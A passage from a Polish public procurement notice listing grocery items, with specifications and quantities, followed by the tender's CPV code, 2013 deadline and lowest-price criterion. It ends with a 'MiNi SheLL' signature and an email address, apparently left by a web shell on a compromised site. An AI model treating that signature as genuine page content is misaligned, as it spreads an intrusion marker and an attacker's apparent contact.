PRZECIER POMIDOROWY, zawartość ekstraktu 30%, opakowanie słoik 190-200g	szt. 	300
KREM DO SMAROWANIA Z ORZECHAMI LASKOWYMI TYPU NUTELLA, zawartość orzechów laskowych min. 13%, wartość energetyczna min. 530 kcal w 100g produktu, opakowanie słoik 350-380g	szt.	100
TYMIANEK, suszony, opakowanie 10-15g	szt. 	40
LIŚĆ LAUROWY, ziele suche, opakowanie 6g	szt. 	40
MAJERANEK, ziele suche otarte, opakowanie 8g	szt. 	50
MAJONEZ DEKORACYJNY TYPU WINIARY, opakowanie słoik 400-450ml, bez konserwantów	szt.	120
MAKARON ŚWIDERKI TYPU LUBELLA NR 19, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	120
MAKARON KOKARDKI TYPU LUBELLA NR 51, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	120
MAKARON NITKI TYPU LUBELLA NR 49, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	160
MAKARON MUSZELKI TYPU LUBELLA NR 26, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	120
MAKARON SPAGHETTI TYPU LUBELLA NR 4, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	100
MAKARON ZACIERKA TYPU LUBELLA, opakowanie 200-250g, jajeczny (jaja min. 5,5%), wartość energetyczna w 100g suchego produktu min. 355 kcal	szt.	50
MĄKA PSZENNA TYP 480, opakowanie 1000g	kg	400
MĄKA ZIEMNIACZANA, opakowanie 1000g	kg	40
MIÓD NATURALNY PSZCZELI, wielokwiatowy nektarowy, opakowanie słoik 400-450g, wartość energetyczna w 100g produktu min. 300 kcal	szt.	100
OLEJ RAFINOWANY SŁONECZNIKOWY, z pierwszego tłoczenia, opakowanie 1000ml 	szt.	250
PIEPRZ CZARNY ZIARNISTY, opakowanie 20-25g	szt.	30
PIEPRZ CZARNY MIELONY, opakowanie 20-25g	szt.	60
PŁATKI ŚNIADANIOWE TYPU CINIS-MINIS z pełnego ziarna pszenicy (zawartość mąki pszennej pełnoziarnistej min. 30%) o smaku cynamonowym, wartość energetyczna w 100g produktu min. 410 kcal, opakowanie 220-300g	szt.	100
PŁATKI ŚNIADANIOWE TYPU CHERRIOS zbożowe kółeczka z miodem, zawartość mąk pełnoziarnistych min. 64%, zawartość miodu min. 4%, wartość energetyczna w 100g produktu min. 360 kcal, opakowanie 220-300g	szt.	100
PŁATKI ŚNIADANIOWE TYPU NESQUIK zbożowe kuleczki o smaku czekoladowym, zawartość mąki pszennej pełnoziarnistej min. 40%, wartość energetyczna w 100g produktu min. 380 kcal, opakowanie 220-300g	szt.	100
PŁATKI ŚNIADANIOWE TYPU NESQUIK zbożowe muszelki o smaku ciemnej i białej czekolady, opakowanie 220-300g, wartość energetyczna w 100g produktu minimum 380 kcal, zawartość kakao minimum 5 %	szt.	100
PŁATKI ŚNIADANIOWE TYPU GOLD FLAKES chrupiące, kukurydziane,  o smaku miodowo - orzechowym, wartość energetyczna w 100g produktu min. 396 kcal, opakowanie 220-300g	szt.	100
PŁATKI OWSIANE GÓRSKIE BŁYSKAWICZNE, wartość energetyczna w 100g produktu min. 360 kcal, opakowanie 400-500g	szt.	60
PŁATKI RYŻOWE BŁYSKAWICZNE, wartość energetyczna w 100g produktu min. 360 kcal, opakowanie 400-500g	szt.	110
SOK OWOCOWY TYPU KUBUŚ, opakowanie butelka 900-1000ml	szt.	400
RYŻ BIAŁY SYPKI, długoziarnisty, opakowanie 1000g, wartość energetyczna w 100g produktu min. 340 kcal	kg	100
SÓL KAMIENNA JODOWANA, opakowanie 1000g	szt.	100
PAPRYKA KONSERWOWA, opakowanie słoik 700-800ml	szt.	50
OGÓREK KONSERWOWY, opakowanie słoik 800-900g	szt.	50
KUKURYDZA KONSERWOWA, opakowanie puszka 300-350g	szt.	50
BRZOSKWINIE KONSERWOWE, opakowanie puszka 800-900g	szt. 	150
ANANAS KONSERWOWY, opakowanie puszka 800-900g	szt. 	150
RODZYNKI, OPAKOWANIE 200-500GR	szt.	50
MORELE SUSZONE, OPAK. 200-500GR	szt.	100
MUSZTARDA TYPU SAREPSKA, opakowanie 200ml	szt.	30
MUSZTARDA TYPU FRANCUSKA, opakowanie 200ml	szt.	30
CHRZAN TARTY, opakowanie słoik 200ml	szt.	20
CIASTECZKA ZBOŻOWE, różne rodzaje: owsiane, sezamowe, z owocami, orkiszowe, opakowanie 250-300g	szt.	500
Groszek konserwowy pojemność 400 gr	szt.	60
Ketchup 500 gr	szt.	90
Ziele angielskie 15 gr	szt.	30
Oregano suszone 10 gr	szt.	20
Pasztet drobiowy, opakowanie puszka 155-170g.	szt.	200
Sok owocowy tłoczony na zimno,pojemność 1000 ml	szt.	300
Groszek ptysiowy 80 gr	szt.	150
BAZYLIA SUSZONA, opakowanie 10-15g	szt	50
WODA ŹRÓDLANA, z głębokich ujęć, hermetycznie zamknięta, w butlach o pojemności 18,9-20l. Łączna ilość składników mineralnych w wodzie musi mieścić się w zakresie od 250 do 1250 mg/l	szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com